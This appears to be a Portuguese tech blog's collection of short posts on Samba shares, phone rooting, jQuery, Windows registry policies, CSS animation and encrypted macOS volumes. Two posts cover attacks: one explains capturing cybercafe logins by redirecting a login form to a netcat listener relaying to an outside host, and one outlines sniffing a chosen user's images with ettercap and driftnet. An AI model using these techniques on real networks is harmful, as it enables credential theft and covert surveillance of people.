Criando pastas seguras no Samba

O SAMBA é um dos serviços mais utilizados para fazer o compartilhamento de arquivos em redes mistas. Uma das coisas que mais se pergunta é em relação a segurança de um compartilhamento com o SAMBA.

[SHARED]
comment = teste de compartilhamento de pasta
path=/storage.local/shared
write list = user
read only = no
writeable = yes
force group= admin_users
hosts allow = 10.0.1.1
valid users= user
browseable = no

Explicando

path=/storage.local/shared
write list = lista de usuários que podem escrever na pasta shared
read only = no
writeable = yes
force group = força o grupo admin_users como owners do diretório
hosts allow = endereços ip das máquinas que podem acessar o compartilhamento
valid users= relação de usuários que podem acessar a pasta
browseable = com a opção no possibilita que o compartilhamento não seja apresentado

O perigo de usar internet em Kiosques e Cybercafes

Este post têm como objetivo a instruir pessoas a não utilizar a internet logando em seus serviços de e-mails, redes sociais etc pois o risco é grande. Um usuário mal intencionado pode roubar suas informações sem sequer precisar de exploits, sniffers ou arp spoofing ele usará apenas o Netcat

A técnica mencionada aqui é simples, um usuário mal intencionado habilita em sua máquina para que escute de pacotes enviados pelo computador cobaia simulando a porta 80 ( HTTP ) e altero o formulário de login do serviço web para que mande esta solicitação para esta nova conexão alterando o source do HTML da página.

Quando um usuário entrar com o login e senha ele enviará automáticamente as informações para o computador do usuário mal intencionado

Entendendo:
nc -l 192.168.1.100 8080 –sh-exec “ncat sincronicx.com 80”

192.168.1.100 -> IP no qual irá escutar as conexões na porta 8080 simulando um servidor WEB

Entenda o funcionamento nos screenshots abaixo:
Screen Shot 2014-07-18 at 7.11.08 PM

Screen Shot 2014-07-18 at 7.11.42 PM

Habilitando Root no LG Optimus E455F

Pré-Requisitos para Root Optimus L3

Na raiz de seu Optimus L3 estas são coisas que você precisa.

Baixe a ferramenta do root para o Windows http://www.mediafire.com/?i7fv18n0iupvrt8

Você tem que habilitar a depuração USB no aparelho. Para fazer isso você tem que ir para a opção de configuração – Aplicativos – desenvolvimento

Certifique-se que o dispositivo tem uma carga de pelo menos 60%, eu recomendo que você tenha pelo menos 90% para ser seguro.

Como Root Optimus L3

Extraia a ferramenta que está no arquivo zip que você baixou.

Você tem que instalar os drivers LG

Conecte o seu aparelho via USB ao computador.

Execute o arquivo “run.bat”

Siga as instruções que apareceram no pront de comando

Espere até este ficar concluído.

NOTA: Seu aparelho vai reiniciar umas 3 ou 4 vezes quando o programa estiver fazendo o root

Verificando status de botões checkbox usando Jquery

Caso você queira buscar o id de um objeto que foi selecionado com checkbox ou que foi desmarcado você pode usar a função Attr do Jquery para detectar estes objetos

Ex:

HTML

<input type=”checkbox” id=”test1″ checked></input>
<input type=”checkbox” id=”test2″ checked></input>
<input type=”checkbox” id=”test3″ checked></input>

JS

$(“input[type=checkbox]”).on(“change”, function(){
if($(this).is(“:not(:checked)”))
alert(this.id);
});

Link
http://jsfiddle.net/4q3c4/

Restringindo recursos pelo Registro do Windows

Artigo em inglês que mostra exemplos de como restringir o acesso a recursos do sistema operacional Windows pelo registro do sistema

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
You can add these DWORD values with an integer value of 0 or 1. 1 turns them on 0 is the same as them not even being there.

NoDeletePrinter : Disables printer deletion
NoAddPrinter : Disables printer adding
NoRun : Removes run from the start menu
NoSetFolders : Removes folders from the Settings option on Start Menu
NoSetTaskbar : Removes taskbar settings
NoFind : removes find from the start menu
NoDrives : Hides all drives in My Comuter
NoNetHood : Removes network neighborhood icon from the desktop
NoDesktop : Hides ALL items on the desktop
NoClose : Disables Shutdown
NoRecentDocHistory : Removes recent docs from start menu
ClearRecentDocsOnExit : Clears doc menu on exit
NoInternetIcon : Removes internet icon from desktop

Can also create key
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System

NoDispCPL : Hides trhe control panel
NoDispBackgroundPage : Hides background change page
NoDispScrsavPage : Hides the screen saver page
NoDispAppearancePage: Hides appearance setting page
NoSecCPL : Hides secure control panel
NoPwdPage : Hides change password page
NoAdminPage : Hides remote admin page
NoProfilePage : Hides user profile page
NoDevMgrPage : Hides device manager page
NoConfigPage : Hides hardware profiles page
NoFileSysPage : Hides file system button
NoVirtMemPage : Hides Virtual Memory Button

Can also create key
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp

Disabled : Disables MS-DOS prompt
NoRealMode : Disable Single-Mode MS-DOS

Can also create key
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Network
NoNetSetupSecurityPage : Hides network security page
NoNelSetup : Hides Network options in control panel
NoNetSetupIDPage : Hides ID page
NoNetSetupSecurityPage : Hides access control page
NoFileSharingControl : Disables file sharing controls
NoPrintSharing : Disables print share control

Scripts para reboot via linha de comando no Windows

Caso você precise criar um script via prompt para reiniciar uma máquina no Windows você pode usar métodos via script BAT ou mesmo Python.

Vou abordar abaixo os dois métodos para exemplificar

Script Python

import win32api
win32api.InitiateSystemShutdown()

Script BAT

shutdown -t 0 -r -f

rundll32.exe shell32.dll,SHExitWindowsEx n

n – é o número do evento que você pode executar

0 – LOGOFF
1 – SHUTDOWN
2 – REBOOT
4 – FORCE
8 – POWEROFF

O que é XKeyscore e o que a NSA pode fazer com este sistema

Xkeyscore é o nome do sistema criado pela NSA para possibilitar que o USA possa rastrear todo e qualquer tipo de conteúdo na internet. Este software foi é utilizado atualmente pelo governo norte americano para interceptar conversas em redes sociais, e-mails, pesquisas em buscadores como Google, Microsoft, Yahoo entre outro.

Quem está livre dele ? Práticamente ninguém. Um funcionário da NSA chamado Edward Snowden preocupado como toda esta situação criada pelo governo americano resolveu abrir o jogo e contar para o mundo estes movimentos do governo americano para monitorar o mundo.

Quer saber mais sobre o assunto ? Veja este link

Criando um Pac Man usando HTML5 e CSS3

Neste tutorial mostrarei como criar um Pac Man usando HTML5 e CSS3

HTML

<div class=”background”>
<div class=”pacman”>
<div class=”mouth”></div>
</div>
</div>

CSS

body{
background: #000;
}

@-webkit-keyframes walk{
0%{
left: 0;
}

100%{
margin-left: -215px;
left: 100%;
}
}

@-webkit-keyframes eat{
50%{
border-bottom: 0 solid transparent;
border-top: 0 solid transparent;
right: -15px;
top: 90px;
}
}

@-o-keyframes walk{
0%{
left: 0;
}

100%{
margin-left: -215px;
left: 100%;
}
}

@-o-keyframes eat{
50%{
border-bottom: 0 solid transparent;
border-top: 0 solid transparent;
right: -15px;
top: 90px;
}
}

@keyframes walk{
0%{
left: 0;
}

100%{
margin-left: -215px;
left: 100%;
}
}

@keyframes eat{
50%{
border-bottom: 0 solid transparent;
border-top: 0 solid transparent;
right: -15px;
top: 90px;
}
}

.background{
/*border: 1px solid;*/
position: relative;
}

.pacman{
-o-animation: walk 10s infinite;
-webkit-animation: walk 10s infinite;
animation: walk 10s infinite;

background: #fffc07;
border-radius: 100%;
height: 200px;
position: absolute;
width: 200px;
}

.pacman::before{
background: #000;
border-radius: 100%;
content: ”;
height: 37px;
position: absolute;
right: 60px;
top: 30px;
width: 24px;
}

.mouth{
-o-animation: eat 0.7s infinite;
-webkit-animation: eat 0.7s infinite;
animation: eat 0.7s infinite;

border-top: 80px solid transparent;
border-bottom: 80px solid transparent;
border-right:60px solid #ff0000;
border-radius: 0 100% 100% 0;
position: absolute;
right: -1px;
top: 20px;
z-index: 3;
}

O resultado você conseguem verificar aqui

https://github.com/buble/PACMAN-HTML5

Melhorando a performance do Google Chrome para execução de vídeos e gráficos

O Google Chrome é sem dúvida um dos melhores navegadores já inventados. Sua performance e optimização o torno dono de milhões de adeptos.

Em alguns casos como o meu ele ainda possibilita a customização de recursos que o tornam ainda mais poderosos. A função chrome://flags possibilita uma otimização maior para os recursos do navegador.

Um dos exemplos é o problema que me deparei com a exibição de vídeos sequêncialmente por longos períodos. O Chrome simplesmente ao invés de apresentar ele mostrava uma tela preta e não exibia o vídeo. Neste caso você deve habilitar a flag

Disable hardware-accelerated video decode.

Diversas outras opções pode ser customizadas nesta área. Veja como e para que funciona cada uma delas aqui

https://developer.chrome.com/extensions/tut_migration_to_manifest_v2.html

Usando o driftnet para capturar imagens de um determinado ip

A ideia aqui é simples. Temos o seguinte cenário.

Queremos descobrir quais as imagens um determinado usuário está acessando na rede. Então utilizaremos a ferramenta Ettercap para sniffar a rede e o driftnet para mostrar as imagens que estão sendo carregadas

Passo 1) Abra um terminal e execute o comando e verifique se o arquivo de configuração do ettercap está configurado com o ec_uid=0 e ec_gid = 0
Screen Shot 2014-07-04 at 0.54.54

Siga o exemplo de acordo com os screenshots abaixo:

1

2

3

4

5

6

Depois da janela do drifnet aberta todas as imagens que o usuário carregar você poderá ver na janela do driftnet

Criando volumes seguros com senha no Mac OS X ( diretórios com senha no OS X )

Esta funcionalidade é bem interessante para quem precisa armazenar informações importantes e seguras no Mac OS X. Digamos que você tenha uma pasta que cotenha informações que queira armazenar com uma senha com criptografia AES que pode variar de 128 a 256 bits.

Para sua informação o próprio OSX já possibilita isto através do Disk Utilites. A utilização é tão simples que você ficará encorajado em utilizar. Siga os passos abaixo para colocar em prática sua configuração

1) O primeiro passo é criar uma pasta em qualquer lugar do sistema e disponibilizar. Utilize o nome que quizer isto não importa neste momento;

2) Abra o aplicativo Disk Utilite que encontra-se dentro da pasta de aplicativos do sistema. A forma mais fácil de encontra-lo é utilizando o Spotlight digitando Disk Utilite

Abrindo o aplicativo vá em File / New / Disk image from folder assim como na imagem abaixo

3) Entre com o nome do volume seguro que deseja utilizar assim como na imagem abaixo. Selecione a opção read/write e selecione o tipo de criptografia que deseja utilizar

4) Entre com a senha para sua pasta. Se você selecionar a opção de lembrar a senha no Keychain você poderá correr o risco de alguém que acessar o seu computador abrir a pasta sem a solicitação da senha. Neste caso a melhor forma é deixar esta opção desmarcada. Siga o exemplo da imagem abaixo

5) Feito isto clique em OK. O Disk Utilite irá criar e montar um disco virtual protegido com a senha que desejou. Depois para utilizar basta duplo clicar no arquivo no format .DMG que foi criado

Simples, rápido e fácil de utilizar.